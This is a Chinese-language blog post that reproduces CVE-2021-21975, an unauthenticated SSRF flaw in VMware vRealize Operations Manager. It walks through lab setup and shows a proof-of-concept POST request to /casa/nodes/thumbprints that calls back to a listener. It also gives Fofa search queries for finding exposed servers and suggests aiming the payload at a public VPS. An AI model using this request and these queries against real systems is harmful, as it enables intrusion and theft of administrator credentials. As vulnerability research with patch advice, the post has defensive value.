VMware vRealize Operations Manager SSRF漏洞复现以及原理简析(CVE-2021-21975)

2021-04-12 7,631

VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975)

0x01 vRealize Operations Manager介绍

vRealize Operations Manager 是vmware官方提供的针对vmware虚拟化平台的一套运维管理解决方案。2021 年 3 月 31 日,VMware官方发布安全公告,披露了CVE-2021-21975 VMware vRealize Operations Manager API SSRF。攻击者在无需身份验证和用户交互的情况下,可利用此漏洞窃取管理凭,可直接反弹shell 。


0x02 影响版本

VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、8.0.1、8.0.0、7.5.0
VMware Cloud Foundation 4.x,3.x
vRealize Suite Lifecycle Manager 8.x


0x03 漏洞原理

由于/casa/nodes/thumbprints该路径的API网络访问权限存在漏洞。攻击者可通过vRealize Operations Manager API的网络访问权限构造恶意请求,可以执行服务器端请求伪造攻击,以窃取管理凭据。


0x04  漏洞复现

这里选择环境搭建的版本为8.3.0,师傅们有兴趣可选择其它版本复现一下。


先注册一个账号才能下载,注册地址

>https://my.vmware.com/cn/web/vmware/registration


微信截图_20210409110322.png


激活之后登录选择下载版本,下载地址

>https://my.vmware.com/zh/group/vmware/patch#search


微信截图_20210409110416.png


下载完成之后选择打开方式,打开方式选择vmware


微信截图_20210409110459.png


选择**下一步**


微信截图_20210409110551.png


选择**导入**


微信截图_20210409110625.png


等待导入成功即可


微信截图_20210409110739.png


启动该虚拟机


微信截图_20210409110811.png



踩坑了,**需要注意**

这里一定需要等待初始化的**5min17s**完成之后才可以,由于我没有初始化完成直接重启虚拟机直接废掉了,所以需要重新导入虚拟机镜像


微信截图_20210409110850.png


访问路径

>https://192.168.31.176

这里直接重定向到UI界面


微信截图_20210409110930.png


点击**快速安装**


微信截图_20210409111048.png


点击->下一步,然后设置密码


微信截图_20210409111323.png


然后点击->完成即可


微信截图_20210409111407.png


等待几分钟后成功访问index页面环境搭建成功


微信截图_20210409111453.png


0x05 漏洞利用

POC

```
POST /casa/nodes/thumbprints HTTP/1.1
Host: x.x.x.x
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Length: 36
["payload_address"]
```

所以构造poyload如下:

```
POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.31.176
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Length: 23
["192.168.31.234:2222"]
```

修改host,查看回显


微信截图_20210409111718.png


监听2222端口查看结果


微信截图_20210409111752.png


windows下自己下载nc.exe,复现的话利用ssrf反弹shell到自己本地比较方便,有一点比较值得注意的就是poc的选择,网上的poc多多少少个别字段有些差异,刚开始反弹不到本地返回信息一直显示400和404,失败的原因就是poc选择的有问题


0x06 Fofa利用

fofa语句

>body="vRealize Operations Manager"


或者

>title="vRealize Operations Manager"


或者

>"vRealize Operations Manager"


指纹可以自己找,好用就行


微信截图_20210409111925.png


利用poc,修改payload的地址为dnslog或者公网vps,反弹shell即可


0x07 免责声明

文章仅供技术交流,任何非法使用造成的后果与本作者无关,谢谢!!!


0x08 修复建议

VMware官网已发布安全补丁,建议下载及时修复漏洞,下载地址

>https://www.vmware.com/security/advisories/VMSA-2021-0004.html

0x09 参考链接

>https://www.vmware.com/security/advisories/VMSA-2021-0004.html



本文作者:Am1azi3ng

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/156723.html

Tags:
评论  (0)
快来写下你的想法吧!

Am1azi3ng

文章数:9 积分: 160

没有说明吖

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号